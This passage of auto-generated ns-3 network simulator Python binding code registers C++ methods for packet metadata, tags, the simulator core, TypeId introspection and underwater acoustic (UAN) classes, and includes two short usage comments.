## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtEnd(uint32_t end) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'end')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtStart(uint32_t start) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'start')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveHeader(ns3::Header const & header, uint32_t size) [member function]
cls.add_method('RemoveHeader',
'void',
[param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveTrailer(ns3::Trailer const & trailer, uint32_t size) [member function]
cls.add_method('RemoveTrailer',
'void',
[param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3PacketMetadataItem_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item() [constructor]
cls.add_constructor([])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item(ns3::PacketMetadata::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata::Item const &', 'arg0')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::current [variable]
cls.add_instance_attribute('current', 'ns3::Buffer::Iterator', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentSize [variable]
cls.add_instance_attribute('currentSize', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromEnd [variable]
cls.add_instance_attribute('currentTrimedFromEnd', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromStart [variable]
cls.add_instance_attribute('currentTrimedFromStart', 'uint32_t', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::isFragment [variable]
cls.add_instance_attribute('isFragment', 'bool', is_const=False)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3PacketMetadataItemIterator_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata::ItemIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata::ItemIterator const &', 'arg0')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata const * metadata, ns3::Buffer buffer) [constructor]
cls.add_constructor([param('ns3::PacketMetadata const *', 'metadata'), param('ns3::Buffer', 'buffer')])
## packet-metadata.h (module 'network'): bool ns3::PacketMetadata::ItemIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item ns3::PacketMetadata::ItemIterator::Next() [member function]
cls.add_method('Next',
'ns3::PacketMetadata::Item',
[])
return
def register_Ns3PacketTagIterator_methods(root_module, cls):
## packet.h (module 'network'): ns3::PacketTagIterator::PacketTagIterator(ns3::PacketTagIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagIterator const &', 'arg0')])
## packet.h (module 'network'): bool ns3::PacketTagIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet.h (module 'network'): ns3::PacketTagIterator::Item ns3::PacketTagIterator::Next() [member function]
cls.add_method('Next',
'ns3::PacketTagIterator::Item',
[])
return
def register_Ns3PacketTagIteratorItem_methods(root_module, cls):
## packet.h (module 'network'): ns3::PacketTagIterator::Item::Item(ns3::PacketTagIterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagIterator::Item const &', 'arg0')])
## packet.h (module 'network'): void ns3::PacketTagIterator::Item::GetTag(ns3::Tag & tag) const [member function]
cls.add_method('GetTag',
'void',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::TypeId ns3::PacketTagIterator::Item::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
return
def register_Ns3PacketTagList_methods(root_module, cls):
## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList() [constructor]
cls.add_constructor([])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList(ns3::PacketTagList const & o) [copy constructor]
cls.add_constructor([param('ns3::PacketTagList const &', 'o')])
## packet-tag-list.h (module 'network'): void ns3::PacketTagList::Add(ns3::Tag const & tag) const [member function]
cls.add_method('Add',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData const * ns3::PacketTagList::Head() const [member function]
cls.add_method('Head',
'ns3::PacketTagList::TagData const *',
[],
is_const=True)
## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Peek(ns3::Tag & tag) const [member function]
cls.add_method('Peek',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Remove(ns3::Tag & tag) [member function]
cls.add_method('Remove',
'bool',
[param('ns3::Tag &', 'tag')])
## packet-tag-list.h (module 'network'): void ns3::PacketTagList::RemoveAll() [member function]
cls.add_method('RemoveAll',
'void',
[])
return
def register_Ns3PacketTagListTagData_methods(root_module, cls):
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData() [constructor]
cls.add_constructor([])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData(ns3::PacketTagList::TagData const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketTagList::TagData const &', 'arg0')])
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::count [variable]
cls.add_instance_attribute('count', 'uint32_t', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::data [variable]
cls.add_instance_attribute('data', 'uint8_t [ 20 ]', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::next [variable]
cls.add_instance_attribute('next', 'ns3::PacketTagList::TagData *', is_const=False)
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3Reservation_methods(root_module, cls):
## uan-mac-rc.h (module 'uan'): ns3::Reservation::Reservation(ns3::Reservation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Reservation const &', 'arg0')])
## uan-mac-rc.h (module 'uan'): ns3::Reservation::Reservation() [constructor]
cls.add_constructor([])
## uan-mac-rc.h (module 'uan'): ns3::Reservation::Reservation(std::list<std::pair<ns3::Ptr<ns3::Packet>, ns3::UanAddress>, std::allocator<std::pair<ns3::Ptr<ns3::Packet>, ns3::UanAddress> > > & list, uint8_t frameNo, uint32_t maxPkts=0) [constructor]
cls.add_constructor([param('std::list< std::pair< ns3::Ptr< ns3::Packet >, ns3::UanAddress > > &', 'list'), param('uint8_t', 'frameNo'), param('uint32_t', 'maxPkts', default_value='0')])
## uan-mac-rc.h (module 'uan'): void ns3::Reservation::AddTimestamp(ns3::Time t) [member function]
cls.add_method('AddTimestamp',
'void',
[param('ns3::Time', 't')])
## uan-mac-rc.h (module 'uan'): uint8_t ns3::Reservation::GetFrameNo() const [member function]
cls.add_method('GetFrameNo',
'uint8_t',
[],
is_const=True)
## uan-mac-rc.h (module 'uan'): uint32_t ns3::Reservation::GetLength() const [member function]
cls.add_method('GetLength',
'uint32_t',
[],
is_const=True)
## uan-mac-rc.h (module 'uan'): uint32_t ns3::Reservation::GetNoFrames() const [member function]
cls.add_method('GetNoFrames',
'uint32_t',
[],
is_const=True)
## uan-mac-rc.h (module 'uan'): std::list<std::pair<ns3::Ptr<ns3::Packet>, ns3::UanAddress>, std::allocator<std::pair<ns3::Ptr<ns3::Packet>, ns3::UanAddress> > > const & ns3::Reservation::GetPktList() const [member function]
cls.add_method('GetPktList',
'std::list< std::pair< ns3::Ptr< ns3::Packet >, ns3::UanAddress > > const &',
[],
is_const=True)
## uan-mac-rc.h (module 'uan'): uint8_t ns3::Reservation::GetRetryNo() const [member function]
cls.add_method('GetRetryNo',
'uint8_t',
[],
is_const=True)
## uan-mac-rc.h (module 'uan'): ns3::Time ns3::Reservation::GetTimestamp(uint8_t n) const [member function]
cls.add_method('GetTimestamp',
'ns3::Time',
[param('uint8_t', 'n')],
is_const=True)
## uan-mac-rc.h (module 'uan'): void ns3::Reservation::IncrementRetry() [member function]
cls.add_method('IncrementRetry',
'void',
[])
## uan-mac-rc.h (module 'uan'): bool ns3::Reservation::IsTransmitted() const [member function]
cls.add_method('IsTransmitted',
'bool',
[],
is_const=True)
## uan-mac-rc.h (module 'uan'): void ns3::Reservation::SetFrameNo(uint8_t fn) [member function]
cls.add_method('SetFrameNo',
'void',
[param('uint8_t', 'fn')])
## uan-mac-rc.h (module 'uan'): void ns3::Reservation::SetTransmitted(bool t=true) [member function]
cls.add_method('SetTransmitted',
'void',
[param('bool', 't', default_value='true')])
return
def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount(ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3Simulator_methods(root_module, cls):
## simulator.h (module 'core'): ns3::Simulator::Simulator(ns3::Simulator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Simulator const &', 'arg0')])
## simulator.h (module 'core'): static void ns3::Simulator::Cancel(ns3::EventId const & id) [member function]
cls.add_method('Cancel',
'void',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Destroy() [member function]
cls.add_method('Destroy',
'void',
[],
is_static=True)
## simulator.h (module 'core'): static uint32_t ns3::Simulator::GetContext() [member function]
cls.add_method('GetContext',
'uint32_t',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetDelayLeft(ns3::EventId const & id) [member function]
cls.add_method('GetDelayLeft',
'ns3::Time',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static ns3::Ptr<ns3::SimulatorImpl> ns3::Simulator::GetImplementation() [member function]
cls.add_method('GetImplementation',
'ns3::Ptr< ns3::SimulatorImpl >',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetMaximumSimulationTime() [member function]
cls.add_method('GetMaximumSimulationTime',
'ns3::Time',
[],
is_static=True)
## simulator.h (module 'core'): static uint32_t ns3::Simulator::GetSystemId() [member function]
cls.add_method('GetSystemId',
'uint32_t',
[],
is_static=True)
## simulator.h (module 'core'): static bool ns3::Simulator::IsExpired(ns3::EventId const & id) [member function]
cls.add_method('IsExpired',
'bool',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static bool ns3::Simulator::IsFinished() [member function]
cls.add_method('IsFinished',
'bool',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::Now() [member function]
cls.add_method('Now',
'ns3::Time',
[],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Remove(ns3::EventId const & id) [member function]
cls.add_method('Remove',
'void',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::SetImplementation(ns3::Ptr<ns3::SimulatorImpl> impl) [member function]
cls.add_method('SetImplementation',
'void',
[param('ns3::Ptr< ns3::SimulatorImpl >', 'impl')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::SetScheduler(ns3::ObjectFactory schedulerFactory) [member function]
cls.add_method('SetScheduler',
'void',
[param('ns3::ObjectFactory', 'schedulerFactory')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Stop() [member function]
cls.add_method('Stop',
'void',
[],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Stop(ns3::Time const & time) [member function]
cls.add_method('Stop',
'void',
[param('ns3::Time const &', 'time')],
is_static=True)
return
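# Illustrative note (not generated by pybindgen): the static Simulator methods
# registered above surface as class methods on the Python side. A minimal
# usage sketch, assuming the usual "ns.core" module layout of the ns-3 Python
# bindings and that Simulator.Run() is also exposed:
#
#   import ns.core
#   ns.core.Simulator.Stop(ns.core.Seconds(10.0))
#   ns.core.Simulator.Run()
#   print(ns.core.Simulator.Now())
#   ns.core.Simulator.Destroy()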
def register_Ns3Tag_methods(root_module, cls):
## tag.h (module 'network'): ns3::Tag::Tag() [constructor]
cls.add_constructor([])
## tag.h (module 'network'): ns3::Tag::Tag(ns3::Tag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Tag const &', 'arg0')])
## tag.h (module 'network'): void ns3::Tag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_pure_virtual=True, is_virtual=True)
## tag.h (module 'network'): uint32_t ns3::Tag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## tag.h (module 'network'): static ns3::TypeId ns3::Tag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## tag.h (module 'network'): void ns3::Tag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## tag.h (module 'network'): void ns3::Tag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3TagBuffer_methods(root_module, cls):
## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(ns3::TagBuffer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TagBuffer const &', 'arg0')])
## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(uint8_t * start, uint8_t * end) [constructor]
cls.add_constructor([param('uint8_t *', 'start'), param('uint8_t *', 'end')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::CopyFrom(ns3::TagBuffer o) [member function]
cls.add_method('CopyFrom',
'void',
[param('ns3::TagBuffer', 'o')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::Read(uint8_t * buffer, uint32_t size) [member function]
cls.add_method('Read',
'void',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
## tag-buffer.h (module 'network'): double ns3::TagBuffer::ReadDouble() [member function]
cls.add_method('ReadDouble',
'double',
[])
## tag-buffer.h (module 'network'): uint16_t ns3::TagBuffer::ReadU16() [member function]
cls.add_method('ReadU16',
'uint16_t',
[])
## tag-buffer.h (module 'network'): uint32_t ns3::TagBuffer::ReadU32() [member function]
cls.add_method('ReadU32',
'uint32_t',
[])
## tag-buffer.h (module 'network'): uint64_t ns3::TagBuffer::ReadU64() [member function]
cls.add_method('ReadU64',
'uint64_t',
[])
## tag-buffer.h (module 'network'): uint8_t ns3::TagBuffer::ReadU8() [member function]
cls.add_method('ReadU8',
'uint8_t',
[])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::TrimAtEnd(uint32_t trim) [member function]
cls.add_method('TrimAtEnd',
'void',
[param('uint32_t', 'trim')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::Write(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Write',
'void',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteDouble(double v) [member function]
cls.add_method('WriteDouble',
'void',
[param('double', 'v')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU16(uint16_t data) [member function]
cls.add_method('WriteU16',
'void',
[param('uint16_t', 'data')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU32(uint32_t data) [member function]
cls.add_method('WriteU32',
'void',
[param('uint32_t', 'data')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU64(uint64_t v) [member function]
cls.add_method('WriteU64',
'void',
[param('uint64_t', 'v')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU8(uint8_t v) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'v')])
return
def register_Ns3Tap_methods(root_module, cls):
## uan-prop-model.h (module 'uan'): ns3::Tap::Tap(ns3::Tap const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Tap const &', 'arg0')])
## uan-prop-model.h (module 'uan'): ns3::Tap::Tap() [constructor]
cls.add_constructor([])
## uan-prop-model.h (module 'uan'): ns3::Tap::Tap(ns3::Time delay, std::complex<double> amp) [constructor]
cls.add_constructor([param('ns3::Time', 'delay'), param('std::complex< double >', 'amp')])
## uan-prop-model.h (module 'uan'): std::complex<double> ns3::Tap::GetAmp() const [member function]
cls.add_method('GetAmp',
'std::complex< double >',
[],
is_const=True)
## uan-prop-model.h (module 'uan'): ns3::Time ns3::Tap::GetDelay() const [member function]
cls.add_method('GetDelay',
'ns3::Time',
[],
is_const=True)
return
def register_Ns3TracedValue__Double_methods(root_module, cls):
## traced-value.h (module 'core'): ns3::TracedValue<double>::TracedValue() [constructor]
cls.add_constructor([])
## traced-value.h (module 'core'): ns3::TracedValue<double>::TracedValue(ns3::TracedValue<double> const & o) [copy constructor]
cls.add_constructor([param('ns3::TracedValue< double > const &', 'o')])
## traced-value.h (module 'core'): ns3::TracedValue<double>::TracedValue(double const & v) [constructor]
cls.add_constructor([param('double const &', 'v')])
## traced-value.h (module 'core'): void ns3::TracedValue<double>::Connect(ns3::CallbackBase const & cb, std::basic_string<char,std::char_traits<char>,std::allocator<char> > path) [member function]
cls.add_method('Connect',
'void',
[param('ns3::CallbackBase const &', 'cb'), param('std::string', 'path')])
## traced-value.h (module 'core'): void ns3::TracedValue<double>::ConnectWithoutContext(ns3::CallbackBase const & cb) [member function]
cls.add_method('ConnectWithoutContext',
'void',
[param('ns3::CallbackBase const &', 'cb')])
## traced-value.h (module 'core'): void ns3::TracedValue<double>::Disconnect(ns3::CallbackBase const & cb, std::basic_string<char,std::char_traits<char>,std::allocator<char> > path) [member function]
cls.add_method('Disconnect',
'void',
[param('ns3::CallbackBase const &', 'cb'), param('std::string', 'path')])
## traced-value.h (module 'core'): void ns3::TracedValue<double>::DisconnectWithoutContext(ns3::CallbackBase const & cb) [member function]
cls.add_method('DisconnectWithoutContext',
'void',
[param('ns3::CallbackBase const &', 'cb')])
## traced-value.h (module 'core'): double ns3::TracedValue<double>::Get() const [member function]
cls.add_method('Get',
'double',
[],
is_const=True)
## traced-value.h (module 'core'): void ns3::TracedValue<double>::Set(double const & v) [member function]
cls.add_method('Set',
'void',
[param('double const &', 'v')])
return
def register_Ns3TypeId_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
cls.add_constructor([param('char const *', 'name')])
## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
cls.add_constructor([param('ns3::TypeId const &', 'o')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
cls.add_method('AddTraceSource',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
cls.add_method('GetAttribute',
'ns3::TypeId::AttributeInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
cls.add_method('GetAttributeFullName',
'std::string',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
cls.add_method('GetAttributeN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
cls.add_method('GetConstructor',
'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
cls.add_method('GetGroupName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
cls.add_method('GetParent',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
cls.add_method('GetRegistered',
'ns3::TypeId',
[param('uint32_t', 'i')],
is_static=True)
## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
cls.add_method('GetRegisteredN',
'uint32_t',
[],
is_static=True)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
cls.add_method('GetTraceSource',
'ns3::TypeId::TraceSourceInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
cls.add_method('GetTraceSourceN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
cls.add_method('GetUid',
'uint16_t',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
cls.add_method('HasConstructor',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
cls.add_method('HasParent',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
cls.add_method('HideFromDocumentation',
'ns3::TypeId',
[])
## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
cls.add_method('IsChildOf',
'bool',
[param('ns3::TypeId', 'other')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
cls.add_method('LookupAttributeByName',
'bool',
[param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
cls.add_method('LookupByName',
'ns3::TypeId',
[param('std::string', 'name')],
is_static=True)
## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
cls.add_method('LookupTraceSourceByName',
'ns3::Ptr< ns3::TraceSourceAccessor const >',
[param('std::string', 'name')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
cls.add_method('MustHideFromDocumentation',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
cls.add_method('SetAttributeInitialValue',
'bool',
[param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
cls.add_method('SetGroupName',
'ns3::TypeId',
[param('std::string', 'groupName')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
cls.add_method('SetParent',
'ns3::TypeId',
[param('ns3::TypeId', 'tid')])
## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
cls.add_method('SetUid',
'void',
[param('uint16_t', 'tid')])
return
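# Illustrative note (not generated by pybindgen): the TypeId registrations
# above, together with the AttributeInformation fields registered in the next
# function, allow attribute introspection from Python. A hedged sketch,
# assuming the "ns.core" module name:
#
#   import ns.core
#   tid = ns.core.TypeId.LookupByName("ns3::UanNetDevice")
#   for i in range(tid.GetAttributeN()):
#       info = tid.GetAttribute(i)
#       print(info.name, info.help)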
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
return
def register_Ns3UanAddress_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## uan-address.h (module 'uan'): ns3::UanAddress::UanAddress(ns3::UanAddress const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanAddress const &', 'arg0')])
## uan-address.h (module 'uan'): ns3::UanAddress::UanAddress() [constructor]
cls.add_constructor([])
## uan-address.h (module 'uan'): ns3::UanAddress::UanAddress(uint8_t addr) [constructor]
cls.add_constructor([param('uint8_t', 'addr')])
## uan-address.h (module 'uan'): static ns3::UanAddress ns3::UanAddress::Allocate() [member function]
cls.add_method('Allocate',
'ns3::UanAddress',
[],
is_static=True)
## uan-address.h (module 'uan'): static ns3::UanAddress ns3::UanAddress::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::UanAddress',
[param('ns3::Address const &', 'address')],
is_static=True)
